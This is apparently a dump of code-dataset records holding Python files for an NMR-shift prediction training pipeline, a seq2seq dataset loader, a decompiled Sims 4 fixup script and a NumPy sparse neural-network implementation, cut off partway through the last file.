'qm9'\nimport wandb\n\nwandb.init(name=\"Train_try1\", project=\"RPNMR\",sync_tensorboard=True)\n\nif SPECT_SET == '13C':\n NUC_LOSS_SCALE = {'13C' : 1.0} \n NUC_STD_SCALE = {'13C' : 1.0} \n STD_REGULARIZE = 0.1\nelse:\n NUC_LOSS_SCALE = {'1H' : 1.0/20.0}\n NUC_STD_SCALE = {'1H' : 10.0} \n STD_REGULARIZE = 0.01\n\ntgt_max_n = 64\nMAX_EPOCHS = 10000\n#MAX_EPOCHS = 1\n\nEXP_NAME = f\"good_{SPECT_SET}\"\n\n\ndef create_validate_func(tgt_nucs):\n def val_func(res): # val, mask, truth):\n val = res['pred_val']\n mask = res['pred_mask']\n truth = res['pred_truth']\n res = {}\n for ni, n in enumerate(tgt_nucs):\n delta = (val[:, :, ni] - truth[:, :, ni])[mask[:, :, ni] > 0].flatten()\n res[f\"{n}/test_std_err\"] = np.std(delta)\n res[f\"{n}/test_max_error\"] = np.max(np.abs(delta))\n res[f\"{n}/test_mean_abs_err\"] = np.mean(np.abs(delta))\n res[f\"{n}/test_abs_err_90\"] = np.percentile(np.abs(delta), 90)\n return res\n return val_func\n\ndef create_uncertain_validate_func(tgt_nucs):\n def val_func(res): # val, mask, truth):\n mu = res['pred_mu']\n std = res['pred_std'] \n mask = res['pred_mask']\n truth = res['pred_truth']\n res = {}\n for ni, n in enumerate(tgt_nucs):\n delta = (mu[:, :, ni] - truth[:, :, ni])[mask[:, :, ni] > 0].flatten()\n masked_std = (std[:, :, ni])[mask[:, :, ni] > 0].flatten()\n res[f\"{n}/test_std_err\"] = np.std(delta)\n res[f\"{n}/test_max_error\"] = np.max(np.abs(delta))\n res[f\"{n}/test_mean_abs_err\"] = np.mean(np.abs(delta))\n res[f\"{n}/test_abs_err_90\"] = np.percentile(np.abs(delta), 90)\n res[f\"{n}/std/mean\"] = np.mean(masked_std)\n res[f\"{n}/std/min\"] = np.min(masked_std)\n res[f\"{n}/std/max\"] = np.max(masked_std)\n\n return res\n return val_func\n\n\n\nnet_params_base = {'init_noise' : 1e-2, \n 'resnet' : True, \n 'int_d' : 2048, \n 'layer_n' : 10, \n 'GS' : 4, \n 'agg_func' : 'goodmax', \n 'force_lin_init' : True, \n 'g_feature_n' : -1, \n 'resnet_out' : True, \n 'out_std' : True, \n 'graph_dropout' : 0.0, \n 'resnet_d': 128, \n 'OUT_DIM' : 1, # update\n}\n\nopt_params_base = {'amsgrad' : False, \n 'lr' : 1e-4,\n 'weight_decay' : 1e-6, \n 'scheduler_gamma' : 0.95, \n 'eps' : 1e-8, \n 'scheduler_step_size' : 10}\n\n\n\ndef params():\n CV_I = int(os.environ.get(\"CV_I\", 0))\n infile = td('graph_conv_many_nuc_pipeline.data.{}.{}.{}.{:d}.{:d}.mol_dict.pickle'.format(SPECT_SET, DATASET_NAME, \n MAT_PROPS, tgt_max_n, CV_I))\n \n seed = 1234 \n\n outfile = f\"respredict_pipeline_{SPECT_SET}.{seed}.{CV_I}.out\"\n \n\n\n yield infile, outfile, seed\n\n@mkdir(CHECKPOINT_DIR)\n@files(params)\ndef train(infile, outfile, seed):\n print(\"infile:\", infile)\n np.random.seed(seed)\n\n d = pickle.load(open(infile, 'rb'))\n\n tgt_nucs = d['tgt_nucs']\n MAX_N = d['MAX_N']\n print(\"TGT_NUCS=\", tgt_nucs)\n print(\"output is\", outfile)\n USE_CUDA = True\n\n mu_scale = []\n std_scale = []\n for tn in tgt_nucs:\n for k, v in NUC_LOSS_SCALE.items():\n if k in tn:\n mu_scale.append(v)\n for k, v in NUC_STD_SCALE.items():\n if k in tn:\n std_scale.append(v)\n assert len(mu_scale) == len(tgt_nucs)\n assert len(std_scale) == len(tgt_nucs)\n print(\"NUC_LOSS_SCALE=\", NUC_LOSS_SCALE)\n print(\"mu_scale=\", mu_scale)\n print(\"std_scale=\", std_scale)\n print(\"tgt_nucs=\", tgt_nucs)\n\n ### Create datasets and data loaders\n\n BATCH_SIZE = 16\n\n dataset_hparams = graph_conv_many_nuc_util.DEFAULT_DATA_HPARAMS\n\n ds_train, ds_test = graph_conv_many_nuc_util.make_datasets({'filename' : infile}, \n dataset_hparams)\n \n dl_train = torch.utils.data.DataLoader(ds_train, batch_size=BATCH_SIZE, \n shuffle=True,pin_memory=True)\n dl_test = torch.utils.data.DataLoader(ds_test, batch_size=BATCH_SIZE, \n shuffle=True,pin_memory=True)\n\n net_params = net_params_base.copy()\n opt_params = opt_params_base.copy()\n\n net_params['g_feature_n'] = ds_test[0][1].shape[-1]\n net_params['OUT_DIM'] = len(tgt_nucs)\n\n use_std = True \n \n net = nets.GraphVertModel(**net_params)\n net = move(net, USE_CUDA)\n\n for n, p in net.named_parameters():\n print(n, p.shape)\n loss_config = {'std_regularize' : STD_REGULARIZE, \n 'mu_scale' : mu_scale, \n 'std_scale' : std_scale}\n\n if use_std:\n std_regularize = loss_config['std_regularize']\n mu_scale = move(torch.Tensor(loss_config['mu_scale']), USE_CUDA)\n std_scale = move(torch.Tensor(loss_config['std_scale']), USE_CUDA)\n criterion = nets.NormUncertainLoss(mu_scale, \n std_scale,\n std_regularize = loss_config['std_regularize'])\n else:\n criterion = nets.MaskedMSELoss()\n\n validate_func = create_uncertain_validate_func(tgt_nucs)\n\n optimizer = torch.optim.Adam(net.parameters(), lr=opt_params['lr'], \n amsgrad=opt_params['amsgrad'], \n eps=opt_params['eps'], \n weight_decay=opt_params['weight_decay'])\n\n \n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, \n step_size=opt_params['scheduler_step_size'], \n gamma=opt_params['scheduler_gamma'])\n\n MODEL_NAME = \"{}.{:08d}\".format(EXP_NAME,int(time.time() % 1e8))\n MODEL_NAME = \"best_model\"\n \n checkpoint_filename = os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".{epoch_i:08d}\")\n print(\"checkpoint:\", checkpoint_filename)\n checkpoint_func = graph_conv_many_nuc_util.create_checkpoint_func(10, checkpoint_filename)\n \n writer = SummaryWriter(\"{}/{}\".format(TENSORBOARD_DIR, MODEL_NAME))\n\n metadata = {'dataset_hparams' : dataset_hparams, \n 'net_params' : net_params, \n 'opt_params' : opt_params, \n 'infile' : infile, \n 'tgt_nucs' : tgt_nucs, \n 'max_n' : MAX_N,\n 'loss_params' : loss_config}\n\n json.dump(metadata, open(os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".json\"), 'w'), \n indent=4)\n print(json.dumps(metadata, indent=4))\n pickle.dump(metadata, \n open(os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".meta\"), 'wb'))\n\n graph_conv_many_nuc_util.generic_runner(net, optimizer, scheduler, criterion, \n dl_train, dl_test, \n MAX_EPOCHS=MAX_EPOCHS, \n USE_CUDA=USE_CUDA, writer=writer, \n validate_func= validate_func, \n checkpoint_func= checkpoint_func)\n\n pickle.dump({'net_params' : net_params, \n 'opt_params' : opt_params, \n 'loss_params' : loss_config}, \n open(outfile, 'wb'))\n\nif __name__ == \"__main__\":\n pipeline_run([train])\n\n\n","sub_path":"source/forwardModel/respredict_pipeline.py","file_name":"respredict_pipeline.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52193606","text":"import logging\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List\n\nfrom rhoknp import Document\nfrom transformers import BatchEncoding, PreTrainedTokenizerBase\nfrom transformers.utils import PaddingStrategy\n\nfrom kwja.datamodule.datasets.base import BaseDataset\nfrom kwja.datamodule.examples import Seq2SeqExample\nfrom kwja.utils.constants import FULL_SPACE_TOKEN, IGNORE_INDEX, NEW_LINE_TOKEN\nfrom kwja.utils.logging_util import track\nfrom kwja.utils.seq2seq_format import get_seq2seq_format\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass(frozen=True)\nclass Seq2SeqModuleFeatures:\n example_ids: int\n src_text: str\n input_ids: List[int]\n attention_mask: List[int]\n seq2seq_labels: List[int]\n\n\nclass Seq2SeqDataset(BaseDataset[Seq2SeqExample, Seq2SeqModuleFeatures]):\n def __init__(\n self,\n path: str,\n tokenizer: PreTrainedTokenizerBase,\n max_src_length: int,\n max_tgt_length: int,\n ext: str = \"knp\",\n ) -> None:\n super().__init__(tokenizer, max_src_length)\n self.path = Path(path)\n\n self.max_src_length: int = max_src_length\n self.max_tgt_length: int = max_tgt_length\n\n self.documents: List[Document] = self._load_documents(self.path, ext)\n self.examples: List[Seq2SeqExample] = self._load_examples(self.documents)\n\n @staticmethod\n def _load_documents(document_dir: Path, ext: str = \"knp\") -> List[Document]:\n documents = []\n for path in track(sorted(document_dir.glob(f\"*.{ext}\")), description=\"Loading documents\"):\n # TODO: fix document files that raise exception\n try:\n documents.append(Document.from_knp(path.read_text()))\n except AssertionError:\n logger.warning(f\"{path} is not a valid knp file.\")\n return documents\n\n def _load_examples(self, documents: List[Document]) -> List[Seq2SeqExample]:\n examples: List[Seq2SeqExample] = []\n example_id: int = 0\n for document in track(documents, description=\"Loading examples\"):\n for sentence in document.sentences:\n src_encoding: BatchEncoding = self.tokenizer(\n \"解析:\" + sentence.text,\n padding=PaddingStrategy.MAX_LENGTH,\n truncation=False,\n max_length=self.max_src_length,\n )\n if len(src_encoding.input_ids) > self.max_src_length:\n logger.warning(f\"Length of source sentence is too long: {sentence.text}\")\n continue\n tgt_encoding: BatchEncoding = self.tokenizer(\n get_seq2seq_format(sentence).replace(\"\\n\", NEW_LINE_TOKEN),\n padding=PaddingStrategy.MAX_LENGTH,\n truncation=False,\n max_length=self.max_tgt_length,\n )\n if len(tgt_encoding.input_ids) > self.max_tgt_length:\n logger.warning(f\"Length of target sentence is too long: {sentence.text}\")\n continue\n examples.append(\n Seq2SeqExample(\n example_id=example_id,\n src_text=sentence.text.strip().replace(\"\\u3000\", FULL_SPACE_TOKEN),\n src_encoding=src_encoding,\n tgt_encoding=tgt_encoding,\n sid=sentence.sid,\n )\n )\n example_id += 1\n if len(examples) == 0:\n logger.error(\n f\"No examples to process. Make sure there exist any documents in {self.path} and they are not too long.\"\n )\n return examples\n\n def encode(self, example: Seq2SeqExample) -> Seq2SeqModuleFeatures:\n seq2seq_labels: List[int] = [\n (seq2seq_tag if seq2seq_tag != self.tokenizer.pad_token_id else IGNORE_INDEX)\n for seq2seq_tag in example.tgt_encoding.input_ids\n ]\n assert len(seq2seq_labels) == self.max_tgt_length\n\n return Seq2SeqModuleFeatures(\n example_ids=example.example_id,\n src_text=example.src_text,\n input_ids=example.src_encoding.input_ids,\n attention_mask=example.src_encoding.attention_mask,\n seq2seq_labels=seq2seq_labels,\n )\n","sub_path":"src/kwja/datamodule/datasets/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175749595","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\sims\\fixup\\sim_info_appearance_fixup_action.py\n# Compiled at: 2020-11-17 03:11:42\n# Size of source mod 2**32: 2227 bytes\nfrom buffs.appearance_modifier.appearance_modifier import AppearanceModifier, AppearanceModifierPriority\nfrom sims.fixup.sim_info_fixup_action import _SimInfoFixupAction\nfrom sims4.tuning.tunable import TunableList, TunableCasPart, Tunable\nfrom cas.cas import OutfitOverrideOptionFlags\n\nclass _SimInfoAppearanceFixupAction(_SimInfoFixupAction):\n FACTORY_TUNABLES = {'cas_parts_add':TunableList(description='\\n All CAS parts in this list will be applied to the sim permanently.\\n ',\n tunable=TunableCasPart()), \n 'apply_to_all_outfits':Tunable(description='\\n If checked, the appearance modifiers will be applied to all outfits,\\n otherwise they will only be applied to the current outfit.\\n ',\n tunable_type=bool,\n default=True)}\n\n def __call__(self, sim_info):\n modifiers = []\n for cas_part in self.cas_parts_add:\n modifier = AppearanceModifier.SetCASPart(cas_part=cas_part, should_toggle=False, replace_with_random=False,\n update_genetics=True,\n _is_combinable_with_same_type=True,\n remove_conflicting=False,\n outfit_type_compatibility=None,\n appearance_modifier_tag=None,\n expect_invalid_parts=False)\n modifiers.append(modifier)\n\n sim_info.appearance_tracker.apply_permanent_appearance_modifiers(modifiers, self.fixup_guid, AppearanceModifierPriority.INVALID, self.apply_to_all_outfits, OutfitOverrideOptionFlags.DEFAULT)","sub_path":"Scripts/simulation/sims/fixup/sim_info_appearance_fixup_action.py","file_name":"sim_info_appearance_fixup_action.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184676576","text":"import os\nimport sys\nimport time\nimport math\nimport copy\nimport random\nimport torch\nimport numpy as np\nimport pandas as pd\nimport argparse\nfrom sklearn import linear_model\nfrom module_time import time_since\n\n\nclass Network_SDL(object):\n def __init__(self, sizes, adj_matrix, parent_child, child_parent, residual_set):\n # layer_predictor_number/sizes: such like [7, 3, 1]\n # adj_matrix: adjacent matrix\n # parent_child: parent child dict\n # chile_parent: child parent dict\n\n np.random.seed(12345)\n\n self.sizes = sizes\n self.num_layers = len(sizes)\n\n self.parent_child = parent_child\n self.child_parent = child_parent\n\n self.residual_set = residual_set\n # biased: sizes[i]*1\n self.biases = [np.random.randn(i, 1) for i in self.sizes[1:]]\n\n # adjacent matrix\n self.adj_matrix = adj_matrix\n\n # calculate each layer which nodes will be left.\n self.list_of_node = self.layer_node_number(parent_child, child_parent, sizes)\n\n # Initialization weight matrix\n self.weights_ur, self.weights = self.weight_matrix_init(\n adj_matrix, self.sizes, self.list_of_node)\n\n # Calculate each layer's child and parent dictionary\n self.index_child, self.index_parent = self.pc_dict(self.weights_ur, self.sizes)\n\n def SGD(self, training_data, validation_data, test_data,\n n_train, n_val, n_test, end_epoch, mini_batch_size, val_mini_batch_size, eta):\n # use stochastic gradient descent method to optimize the objective function\n\n # training_data: training data\n # epochs: learning epochs\n # mini_batch_size\n # eta: learning rate, lr\n # validation_data\n # test_data\n\n # loss dict\n loss_training = []\n loss_validation = []\n\n # temp_w = [np.zeros([y, x]) for x, y in zip(self.sizes[:-1], self.sizes[1:])]\n # temp_b = [np.zeros([y, 1]) for y in self.sizes[1:]]\n\n # calculate time\n start = time.time()\n\n group = n_train / mini_batch_size * end_epoch\n\n print(\"\\nStart training\")\n # random select training data into mini batch\n for epoch in range(end_epoch):\n step = 0\n random.shuffle(training_data)\n\n # create mini_batches\n mini_batches = [list(training_data)[k:k + mini_batch_size]\n for k in range(0, n_train, mini_batch_size)]\n\n # use mini_batch to calculate loss\n for mini_batch in mini_batches:\n step += 1\n # Organize data\n mini_batch = self.data_organize(mini_batch)\n\n # Update parameters\n self.weights, self.biases = self.update_weight(mini_batch, eta)\n\n # Calculate loss\n loss_training.append(self.evaluate(mini_batch))\n\n # Print training loss\n print_training = 'Epoch: %d / %d, Accumulate Time to End: %s, ' \\\n '(Batch: %d / Batches num: %d, Percent Run: %.2f%%), '\\\n 'Training MSE Loss: %.4f' % (epoch+1, end_epoch, time_since(start,\n (step+epoch*n_train/mini_batch_size)/group),\n step, n_train / mini_batch_size,\n (epoch * (n_train / mini_batch_size) + step)/group * 100,\n self.evaluate(mini_batch))\n print(print_training)\n sys.stdout.flush()\n # print(self.weights[-2], self.biases[-2])\n\n ######################################################################\n # Use validation method to select the best parameters\n ######################################################################\n\n # Create mini_batches\n val_mini_batches = [list(validation_data)[k:k + val_mini_batch_size]\n for k in range(0, n_test, val_mini_batch_size)]\n\n # use mini_batch to calculate loss\n loss_val_all = 0\n loss_val_part = 0\n loss_val_average = 0\n\n for val_mini_batch in val_mini_batches:\n # transform data format\n val_mini_batch = self.data_organize(val_mini_batch)\n\n # Keep loss_validation\n loss_val_part = self.evaluate(val_mini_batch)\n loss_val_all += loss_val_part\n\n # average loss of val\n loss_val_average = loss_val_all/len(val_mini_batches)\n\n # Save validation_loss\n loss_validation.append(loss_val_average)\n # Print training loss\n print_val = '\\nValidation: Epoch: %d / %d, Validation MSE Loss: %.4f' % (epoch+1, end_epoch, loss_val_average)\n print(print_val)\n sys.stdout.flush()\n\n # check points\n # First create a model check point folder\n if not os.path.exists('model_checkpoint_train'):\n os.makedirs('model_checkpoint_train')\n\n checkpoint = {\n 'epoch': epoch+1,\n 'learning_rate': eta,\n 'w': self.weights,\n 'biases': self.biases,\n 'validation_loss': loss_val_average\n }\n\n # Need change the name of saving the model parameter name\n save_epoch = epoch + 1\n model_name = os.path.join('model_checkpoint_train/', \"SDL_epoch_%d.pt\" % save_epoch)\n\n # Save model parameters\n torch.save(checkpoint, model_name)\n print(\"Save model as %s \\n\" % model_name)\n\n # For test\n # we can select the minimal of validation then use if for test result.\n return loss_validation\n\n def data_organize(self, mini_batch):\n # transform data from [[x1,y1], [x2,y2]] to [[x1, x2], [y1, y2]]\n\n # mini_batch_size\n n = len(mini_batch)\n\n # predictor size\n m = mini_batch[0][0].shape[0]\n\n x = []\n y = []\n for i in range(n):\n x.append(mini_batch[i][0])\n y.append(mini_batch[i][1])\n\n x = np.reshape(x, (n, m))\n y = np.reshape(y, (n, 1))\n return [x, y]\n\n def update_weight(self, mini_batch, eta):\n # update data weights and bias\n\n # get X design matrix and response y vector\n x_matrix = mini_batch[0]\n y_vector = mini_batch[1]\n\n # get delta variable; x: m*n, y: 1*n\n delta_nabla_b, delta_nabla_w = self.backprop(np.transpose(x_matrix), np.transpose(y_vector))\n\n # update weights and biases\n weights = [w - (eta * nw)\n for w, nw in zip(self.weights, delta_nabla_w)]\n biases = [b - (eta * nb)\n for b, nb in zip(self.biases, delta_nabla_b)]\n\n return weights, biases\n\n def layer_node_number(self, parent_child, child_parent, sizes):\n # calculate each layer node\n\n list_of_node = [[] for _ in range(len(sizes))]\n list_of_node[-1] = [0]\n\n for k in range(len(sizes) - 1):\n list_of_node[k] = list(parent_child.keys())\n if k == len(sizes) - 1:\n break\n\n delete_number = []\n parent_to_null = []\n\n for i in list_of_node[k]:\n if parent_child[i] == []:\n # avoid root nodes\n if child_parent[i] == []:\n continue\n # delete nodes who don't have child\n else:\n # nodes need to be deleted\n delete_number.append(i)\n # next step leaf nodes\n parent_to_null.append(child_parent[i])\n\n # update parent-child dict\n for i in list(list_of_node[k]):\n # prepare delete nodes who don't have children\n if parent_child[i] == []:\n # avoid root nodes\n if child_parent[i] == []:\n break\n else:\n del parent_child[i]\n\n # set parents to next layer child\n for i in range(len(delete_number)):\n for j in parent_to_null[i]:\n parent_child[j] = []\n\n return list_of_node\n\n def weight_matrix_init(self, adj_matrix, sizes, list_of_node, scale = False):\n # Initialization weight matrix, created w_final\n # return w_final\n\n # Define fixed random effect\n np.random.seed(12345)\n\n # how many weight matrix needed\n weight_mat_number = len(sizes) - 1\n\n # double sizes for [x, epsilon] use\n sizes_double = []\n for i in range(weight_mat_number + 1):\n sizes_double.append(sizes[i] * 2)\n\n # weights\n w_mat = [np.random.randn(y, x) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n # Scale weight parameters smaller or larger\n if scale == True:\n for i in range(weight_mat_number):\n w_mat[i] = w_mat[i]/3\n\n # list_of_node from [0,1,2] change to [0,1,2,0,1,2], leave the last to 1 * 6 (1*3|1*3)\n for i in range(self.num_layers):\n list_of_node[i].extend(list_of_node[i])\n\n # keep each layer node name for W_hat\n list_of_node_name = [[] for _ in range(weight_mat_number + 1)]\n list_of_node_name[-1] = map(lambda i: 'x' + str(i), list_of_node[-1])\n for j in range(len(list_of_node)):\n list_of_node_name[j] = list(map(lambda i: 'x_' + str(i), list_of_node[j][:int(len(list_of_node[j]) / 2)]))\n list_of_node_name[j].extend(list(map(lambda i: 'epsilon_' + str(i),\n list_of_node[j][int(len(list_of_node[j]) / 2):])))\n\n # Give Adjacent column and row name,\n # adj_mat_NAME [ epsilon_0, epsilon_1, ...,\n # x_0,\n # x_1,\n # ...\n # ]\n # and is DataFrame\n adj_mat_NAME = [[] for _ in range(weight_mat_number + 1)]\n adj_mat_NAME[0] = pd.DataFrame(adj_matrix, index=list_of_node_name[0][: int(len(list_of_node_name[0])/2)],\n columns=list_of_node_name[0][int(len(list_of_node_name[0])/2):])\n\n # Create W_hat matrix for each layer\n W_hat = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n W_hat_copy = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n # Give W_hat matrix column and row name:\n for i in range(weight_mat_number):\n w_mat[i] = pd.DataFrame(w_mat[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n W_hat[i] = pd.DataFrame(W_hat[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n W_hat_copy[i] = pd.DataFrame(W_hat_copy[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n\n # Initialization W_hat matrix: left and right\n # Layer i\n for i in range(weight_mat_number):\n # Right half of W\n for j in list_of_node_name[i][int(len(list_of_node_name[i])/2):]:\n # Upper half of W\n for k in list_of_node_name[i + 1][:int(len(list_of_node_name[i + 1])/2)]:\n if adj_mat_NAME[i][j][k] != 0:\n W_hat[i][j][k] = w_mat[i][j][k]\n W_hat_copy[i][j][k] = w_mat[i][j][k]\n\n # delete x_variable: row\n delete_number_of_row = list(set(list_of_node_name[i][:int(len(list_of_node_name[i])/2)]).symmetric_difference(\n set(list_of_node_name[i+1][:int(len(list_of_node_name[i+1])/2)])))\n # delete epsilon_variable: column\n delete_number_of_col = list(set(list_of_node_name[i][int(len(list_of_node_name[i])/2):]).symmetric_difference(\n set(list_of_node_name[i + 1][int(len(list_of_node_name[i + 1])/2):])))\n # Update adjacent matrix layer by layer\n adj_mat_NAME[i + 1] = adj_mat_NAME[i].drop(delete_number_of_row) # row\n adj_mat_NAME[i + 1] = adj_mat_NAME[i + 1].drop(delete_number_of_col, axis=1) # column\n\n\n # Then W_hat will be transformed from DataFrame to ndarray matrix: w_nda, W_HAT_copy ndarray\n w_nda = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n w_nda_u = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n for i in range(weight_mat_number):\n w_nda[i] = W_hat[i].values\n w_nda_u[i] = W_hat_copy[i].values\n\n # Delete the last row: [x_0, epsilon_0] -> [x_0]\n w_mat[-1] = w_mat[-1].drop(['epsilon_0'], axis=0)\n\n\n # w_nda, w_nda_u is the normal matrix\n # w_nda_u to become double matrix\n for i in range(len(sizes)-1):\n next_layer_size_by_two = w_nda_u[i].shape[0]\n # Assign upper, right half of w_mat to upper left of w_nda_u\n for j in range(int(next_layer_size_by_two/2)):\n w_nda_u[i][j][j] = (w_mat[i].values)[j][j]\n\n w_nda_u[-1] = np.delete(w_nda_u[-1], 1, 0)\n\n # w_nda_u right part of the W\n w_nda_ur = [np.zeros([y, x]) for x, y in zip(sizes[:-1], sizes[1:])]\n # layer i, upper + right\n for i in range(len(w_nda)):\n rown = np.shape(w_nda[i])[0]\n coln = np.shape(w_nda[i])[1]\n for j in range(0, int(rown/2)):\n for k in range(int(coln/2), coln):\n w_nda_ur[i][j][k - int(coln/2)] = w_nda[i][j][k]\n\n # Finally, w_final version: take upper level of the w_nda_u row (500*2000)\n w_final = [[] for _ in range(len(w_mat))]\n for i in range(weight_mat_number - 1):\n w_final[i] = w_nda_u[i][:int(len(w_nda_u[i])/2)]\n w_final[-1] = w_nda_u[-1]\n\n # W_hat, W_hat_copy: Data_frame version\n # w_nda_ur: is the w_final [upper and right part]\n # w_final: is the final w\n return w_nda_ur, w_final\n\n def pc_dict(self, weights_ur, sizes):\n # return each layer parent_child dict\n\n # Create each layer child, parent dictionary\n index_child = [{} for _ in range(len(weights_ur))]\n index_parent = [{} for _ in range(len(weights_ur))]\n\n # For layer: l\n for l in range(len(weights_ur)):\n # row_n: represents W row number = l+1 layer nodes number\n # col_n: represents W column number/2 = l layer nodes number\n row_n = int(np.shape(weights_ur[l])[0])\n col_n = int(np.shape(weights_ur[l])[1])\n\n for i in range(row_n):\n index_child[l][i] = list(np.where(weights_ur[l][i] != 0)[0])\n\n for j in range(col_n):\n index_parent[l][j] = list(np.where(weights_ur[l][..., j] != 0)[0])\n\n # extra add - need fix: double make sure\n index_parent[-1][0] = []\n\n return index_child, index_parent\n\n def backprop(self, x, y):\n # calculate back_propogation delta\n # return delta\n\n # Initialization\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_b_mult = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n nabla_w_mult = [np.zeros(w.shape) for w in self.weights]\n\n # H_hat_matrix and b_vector\n h_hat, b_intercept = self.h_matrix_init(self.sizes)\n\n # sample number\n n = x.shape[1]\n\n # acitvation list for each layer\n activations_layer = [x]\n\n # Generate X_epsilon = H_hat * X,\n # b_intercept corresponding in formula (4)\n x_epsilon, h_hat[0], b_intercept[0] = self.epsilon_gen(x, self.index_parent[0], h_hat[0], b_intercept[0])\n\n # Set one transient variable activation to represent\n activation = x_epsilon\n\n # Define z_s as the list of variable before activation function\n z_s = []\n i = 1\n for b, w in zip(self.biases[:-1], self.weights[:-1]):\n # do matrix multiplication\n z = np.dot(w, activation) + b\n z_s.append(z)\n\n # do sigmoid\n activation = self.sigmoid(z)\n activations_layer.append(activation)\n\n # iterative this process\n if i < (len(self.sizes) - 1):\n activation, h_hat[i], b_intercept[i] = self.epsilon_gen(\n activation, self.index_parent[i], h_hat[i], b_intercept[i])\n i += 1\n\n # For the last layer\n z = np.dot(self.weights[-1], activation) + self.biases[-1]\n z_s.append(z)\n\n # Use for later\n activation = z\n # The last result = y_hat\n activations_layer.append(z)\n\n # Method2: backward method for each data point\n for i in range(n):\n # backward pass\n # In the last layer's delta\n delta = self.loss_derivative(activations_layer[-1][:, i], y[:, i]) # * sigmoid_prime(zs[-1])\n # Reshape delta to array [[]] format\n delta = np.reshape(delta, (len(delta), 1))\n # nabla_b[-1]\n nabla_b[-1] = delta\n # nabla_w[-1]\n # H_X is the H * X\n H_X = np.dot(h_hat[-1], activations_layer[-2][:, i])\n nabla_w[-1] = np.dot(delta, np.reshape(H_X, (len(H_X), 1)).transpose())\n\n # then back_propagation from L-1 layer\n for l in range(2, self.num_layers):\n # Reshape the z\n z = np.reshape(z_s[-l][:, i], (len(z_s[-l][:, i]), 1))\n # Sigmoid derivative\n s_p = self.sigmoid_prime(z)\n # Appendix formula (12)\n delta = np.dot(np.dot(self.weights[-l + 1], h_hat[-l + 1]).transpose(),\n delta) * s_p\n # Set nabla_b is the delta\n nabla_b[-l] = delta\n # Set nabla_w is the H_X: (H*x) * delta\n H_X = np.dot(h_hat[-l], activations_layer[-l - 1][:, i])\n nabla_w[-l] = np.dot(delta, np.reshape(H_X, (len(H_X), 1)).transpose())\n\n for k in range(len(nabla_b)):\n nabla_b_mult[k] = nabla_b_mult[k] + nabla_b[k]\n nabla_w_mult[k] = nabla_w_mult[k] + nabla_w[k]\n\n for k in range(len(nabla_b)):\n nabla_b_mult[k] = nabla_b_mult[k] / n\n nabla_w_mult[k] = nabla_w_mult[k] / n\n\n nabla_w_mult = self.w_assign_zero(self.weights, nabla_w_mult)\n\n # backward pass - Method one - batch\n '''delta = self.cost_derivative(activations[-1], y) # * sigmoid_prime(zs[-1])\n nabla_b[-1] = self.aver_1(delta)\n #nabla_w[-1] = np.dot(delta, activations[-2].transpose())\n t = np.zeros((sampleNum, np.shape(activations[-2].transpose())[1] ))\n for i in range(np.shape(delta)[1]):\n t[i] = np.dot(delta[0][i], (activations[-2].transpose())[i,:]) \n nabla_w[-1] = self.aver_2(t)\n nabla_w[-1] = np.reshape(nabla_w[-1], (1,len(nabla_w[-1])))\n\n for l in xrange(2, self.num_layers):\n z = zs[-l]\n sp = sigmoid_prime(z)\n delta = np.dot(self.weights[-l+1].transpose(), delta) * sp # Hadamard product\n nabla_b[-l] = self.aver_1(delta)\n\n t = [[] for _ in range(np.shape(delta)[1])]\n for j in range(np.shape(delta)[1]):\n t[j] = np.reshape(delta[...,j],(len(delta[...,j]),1)) * (activations[-l-1].transpose())[j] \n nabla_w[-l] = self.aver_2(t)\n\n nabla_w = self.transfrom(self.weights, nabla_w)'''\n\n return (nabla_b_mult, nabla_w_mult)\n\n def feed_forward(self, x, y):\n # Calculate final predict\n\n # For layer 0\n i = 0\n # Initialization the linear part coefficients\n h_hat, b_intercept = self.h_matrix_init(self.sizes)\n\n # For layer i\n for b, w in zip(self.biases[:-1], self.weights[:-1]):\n # Calculate x_s\n x_s, h_hat[i], b_intercept[i] = self.epsilon_gen(\n x, self.index_parent[i], h_hat[i], b_intercept[i])\n x = self.sigmoid(np.dot(w, x_s) + b)\n i += 1\n\n # For layer L\n x_s, h_hat[-1], b_intercept[-1] = self.epsilon_gen(\n x, self.index_parent[-1], h_hat[-1], b_intercept[-1])\n\n # Get the final predict\n y_hat = np.dot(self.weights[-1], x_s) + self.biases[-1]\n\n mse = np.sum((y_hat - y) ** 2) / y.shape[1]\n\n return np.array([mse])\n\n def h_matrix_init(self, sizes):\n # H hat matrix initialization\n\n h_matrix = [[] for _ in range(len(sizes) - 1)]\n b_bias = [[] for _ in range(len(sizes) - 1)]\n\n for i in range(len(sizes) - 1):\n h_upper = np.identity(sizes[i])\n h_lower = np.identity(sizes[i])\n h_matrix[i] = np.concatenate((h_upper, h_lower), axis=0)\n b_bias[i] = np.zeros((2 * sizes[i], 1))\n\n return h_matrix, b_bias\n\n def epsilon_gen(self, x, i_p, h_mat, b_intercept):\n # x is the data 